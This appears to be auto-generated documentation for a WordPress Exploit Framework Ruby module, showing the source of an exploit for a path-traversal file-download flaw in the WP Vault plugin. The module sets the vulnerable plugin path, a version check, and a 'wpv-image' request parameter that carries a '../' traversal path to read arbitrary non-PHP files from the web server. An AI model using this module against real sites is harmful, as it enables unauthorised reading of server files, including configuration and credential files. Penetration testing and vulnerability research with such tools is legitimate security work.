class Wpxf::Auxiliary::WpVaultFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'WP Vault File Download',
    desc: %(
      This module exploits a vulnerability which allows you to download any file
      accessible by the user the web server is running as, with the exception of
      PHP files.
    ),
    author: [
      'Lenon Leite', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8684']
    ],
    date: 'Nov 30 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 27
def check
  check_plugin_version_from_readme('wp-vault')
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 31
def default_remote_file_path
  '../../../../license.txt'
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 43
def download_request_params
  { 'wpv-image' => remote_file }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 39
def downloader_url
  full_uri
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb, line 35
def working_directory
  'wp-content/plugins/wp-vault/images/'
end